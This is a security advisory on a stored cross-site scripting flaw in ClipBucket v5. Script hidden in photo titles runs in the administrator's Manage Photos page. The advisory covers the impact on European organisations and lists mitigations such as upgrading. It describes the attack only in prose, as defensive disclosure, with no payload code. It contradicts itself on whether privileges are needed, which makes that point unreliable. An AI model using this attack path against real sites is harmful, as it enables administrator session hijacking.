CVE-2025-64336 is a stored Cross-site Scripting (XSS) vulnerability affecting ClipBucket v5 versions up to 5.5.2-#146. ClipBucket is an open source platform for video sharing, widely used for hosting and managing multimedia content. The vulnerability arises from improper neutralization of input during web page generation (CWE-79), specifically in the Manage Photos feature. Authenticated regular users can upload photos with maliciously crafted Photo Titles containing embedded HTML or JavaScript code. While the malicious script does not execute in the public-facing photo gallery or detail pages, it is rendered unsafely in the administrative interface under Admin → Manage Photos. This results in the execution of arbitrary JavaScript in the context of the administrator’s browser session. The attack vector requires the attacker to have a valid user account and to upload a photo with the malicious payload. Once the administrator accesses the Manage Photos page, the script executes, potentially allowing session hijacking, privilege escalation, or other malicious actions such as unauthorized administrative commands. The vulnerability does not require elevated privileges beyond a regular user account but does require some user interaction (administrator visiting the vulnerable page). The CVSS 4.0 base score is 7.2 (high), reflecting network attack vector, low attack complexity, no privileges required, partial user interaction, and high impact on confidentiality and integrity. The vulnerability was reserved on 2025-10-30 and published on 2025-11-07. No known exploits in the wild have been reported. The issue is resolved in ClipBucket version 5.5.2-#147. This vulnerability also relates to CWE-269 (Improper Privilege Management) due to the impact on administrative functions. The root cause is insufficient input sanitization and output encoding in the admin interface, allowing stored XSS payloads to execute.

For European organizations using ClipBucket v5, particularly versions prior to 5.5.2-#147, this vulnerability poses a significant risk to administrative account security and overall platform integrity. Successful exploitation can lead to administrator session hijacking, enabling attackers to gain control over the video sharing platform’s backend. This can result in unauthorized content manipulation, data theft, insertion of malicious content, or disruption of services. Given that the attack requires an authenticated user account, organizations with open or weak user registration controls are at higher risk. The impact on confidentiality and integrity is high, as attackers can access sensitive administrative functions and data. Availability impact is lower but possible if attackers disrupt administrative operations. European organizations hosting user-generated video content, educational platforms, media companies, or internal collaboration tools using ClipBucket are particularly vulnerable. The threat is exacerbated if administrative access is not tightly controlled or if administrators are not trained to recognize suspicious activity. The lack of known exploits in the wild reduces immediate risk but does not eliminate the threat, especially as proof-of-concept code could emerge. The vulnerability could be leveraged in targeted attacks against high-value European entities relying on ClipBucket for content management.

1. Immediate upgrade to ClipBucket version 5.5.2-#147 or later, where the vulnerability is patched. 2. Restrict access to the Admin → Manage Photos interface using network-level controls such as VPNs, IP whitelisting, or multi-factor authentication to reduce exposure. 3. Implement strict user registration and verification processes to prevent malicious users from obtaining authenticated accounts. 4. Employ Content Security Policy (CSP) headers to limit the impact of potential XSS payloads in the admin interface. 5. Conduct regular security training for administrators to recognize and report suspicious behavior or unexpected interface content. 6. Monitor logs for unusual photo uploads or administrative access patterns that could indicate exploitation attempts. 7. If immediate patching is not possible, consider temporarily disabling the Manage Photos feature or limiting photo title input length and sanitizing inputs at the web server or application firewall level. 8. Review and enhance input validation and output encoding practices in custom deployments or forks of ClipBucket. 9. Use web application firewalls (WAFs) with rules designed to detect and block XSS payloads targeting the admin interface. 10. Regularly audit user privileges to ensure least privilege principles are enforced.